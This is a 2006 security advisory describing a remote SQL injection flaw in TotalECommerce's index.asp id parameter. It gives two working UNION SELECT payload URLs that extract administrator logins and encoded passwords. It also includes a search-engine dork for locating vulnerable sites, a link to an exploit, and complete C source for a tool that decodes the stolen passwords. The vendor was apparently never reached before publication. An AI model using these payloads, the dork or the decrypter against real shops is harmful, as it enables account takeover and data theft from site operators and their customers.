Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.
--Security Report--
Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 04/03/06 04:36 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@xxxxxxxxxx
Web: http://www.nukedx.com
}
---
Vendor: TotalECommerce (http://www.totalecommerce.com)
Version: 1.0 and prior version must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to id
parameter
in index.asp
Level: Critical
---
How&Example:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and with
example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.
---
Timeline:
* 04/03/2006: Vulnerability found.
* 04/03/2006: Could not contact with vendor.
* 04/03/2006: File closed.
---
Exploit&Decrypter:
http://www.nukedx.com/?getxpl=18
---
Dorks: intext:"totalecommerce"
---
Original advisory: http://www.nukedx.com/?getxpl=18
---
Decrypter source in C
---
/*********************************************
* TotalECommerce PWD Decrypter *
* Coded by |SaMaN| for nukedx *
* http://www.k9world.org *
* IRC.K9World.Org *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main()
{
char buf[255];
char buf2[255];
char buf3[255];
char *texto;
char *vcrypt;
int i,x,z,t = 0;
char saman;
texto = buf;
vcrypt = buf2;
printf("%s", "|=------------------------------------=|\n");
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
printf("%s", "|=------------------------------------=|\n\n");
printf("%s", "Enter crypted password: ");
scanf("%200s", buf);
if (!texto)
vcrypt = "";
for (i = 0; i < strlen(texto); i++)
{
if ((vcrypt == "") || (i > strlen(texto)))
x = 1;
else
x = x + 1;
t = buf[i];
z = 255 - t;
saman = toascii(z);
snprintf(buf3, 250, "%c", saman);
strncat(buf2, buf3, 250);
}
printf("Result: %s\n", buf2);
return;
}
---End of code---
Greets to: |SaMaN|